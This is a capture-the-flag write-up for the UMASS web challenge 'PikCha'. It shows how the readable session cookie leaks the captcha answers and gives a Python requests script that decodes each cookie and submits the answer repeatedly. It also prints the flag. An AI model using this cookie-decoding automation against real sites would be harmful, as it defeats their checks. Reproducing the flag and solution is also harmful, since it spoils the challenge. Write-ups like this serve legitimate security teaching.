PikCha
Category: web
241 points
http://104.197.195.221:8084 http://34.121.84.161:8084
Created by Soul#8230
Solution
We were given webpage with some kinda form.
After some investigations we found out, that the form expect us to input pokemon index numbers from pokedex for pokemons
shown on the image. We also found out, the progress is tracked in the cookie, where also correct answer can be found.
Cookie was base64
encrypted with something that may be digital sign added.
Example session
cookie:
eyJhbnN3ZXIiOls3Nyw0MCw2OSwxMDhdLCJjb3JyZWN0IjowLCJpbWFnZSI6Ii4vc3RhdGljL2NoYWxsLWltYWdlcy9CTUJhV0tvc2ZVLmpwZyJ9.YGGcfw.OOaq3G8PWTe2WBC9QFUGIb5M24c
The part “to the first dot” decrypted:
{"answer":[77,40,69,108],"correct":0,"image":"./static/chall-images/BMBaWKosfU.jpg"}
I’ve decided to solve the challenge with python
and requests
library. Below script gave the flag.
import requests
import base64
import json
def get_answer(cookie):
ans = cookie.split('.')[0]
missing_padding = len(ans) % 4
if missing_padding:
ans = ans + '=' * (4 - missing_padding)
return json.loads(base64.b64decode(ans).decode('ascii'))
r = requests.get('http://34.121.84.161:8084/')
answer = get_answer(r.cookies['session'])
for i in range(500):
payload = {"guess": ' '.join([str(i) for i in answer['answer']])}
r = requests.post('http://34.121.84.161:8084/', data=payload, cookies=r.cookies)
answer = get_answer(r.cookies['session'])
print(r.content)
Note, that cookie has missing padding. That’s why I had to add some code to add it back.
Flag
UMASS{G0tt4_c4tch_th3m_4ll_17263548}